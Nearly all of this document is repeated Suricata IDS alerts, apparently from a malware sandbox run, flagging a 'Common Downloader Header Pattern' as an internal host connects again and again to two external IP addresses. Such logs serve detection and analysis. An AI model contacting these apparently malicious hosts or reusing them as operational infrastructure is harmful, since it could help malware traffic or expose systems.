Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49898 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49897 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49935 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49975 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49895 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49917 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49952 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50026 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50076 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50048 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50097 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50051 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50002 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49838 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49796 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50126 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50148 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49920 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50128 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50203 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49984 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50151 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49860 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50177 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50296 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50237 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50293 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50179 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50233 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50205 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49959 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50328 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50339 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50454 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50371 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50422 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49822 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50279 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50372 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50506 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50464 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50415 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50467 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50099 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50247 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50459 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50643 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49938 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50762 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50549 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49937 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50545 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50393 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50717 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50713 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50079 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51084 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50603 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50029 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51029 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51071 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50326 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51048 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50285 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51177 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51304 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50390 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51588 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51748 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51572 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51369 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51461 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51807 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50648 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51741 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51258 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54683 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50342 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52997 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51919 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51946 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50770 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57316 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59328 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55606 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58940 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61799 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50255 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65244 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61306 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51370 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50853 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63221 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53048 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49614 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49999 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55059 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57493 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53658 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55060 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58512 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:64121 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50509 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61316 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63454 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60772 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50870 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50868 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49154 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52788 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54209 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52835 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65289 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56681 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60671 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58741 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54325 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63920 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51797 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52806 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50825 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58639 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63794 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58358 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54033 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65458 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50599 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56038 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:55419 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49190 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52005 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60441 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61986 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54070 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57352 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58708 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51229 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52150 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61199 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60121 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60021 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:64597 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61491 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61570 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57816 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56199 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50845 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65326 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:60820 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63612 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:65389 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50829 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50847 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52198 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52158 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56587 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53837 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53724 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63505 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54347 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:50975 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:52752 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54354 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:54029 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63737 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56252 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63569 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56039 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57129 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58090 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58562 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:56254 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58153 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58073 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58146 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59839 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59732 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61903 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:63465 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:61081 -> 107.163.241.232:12354
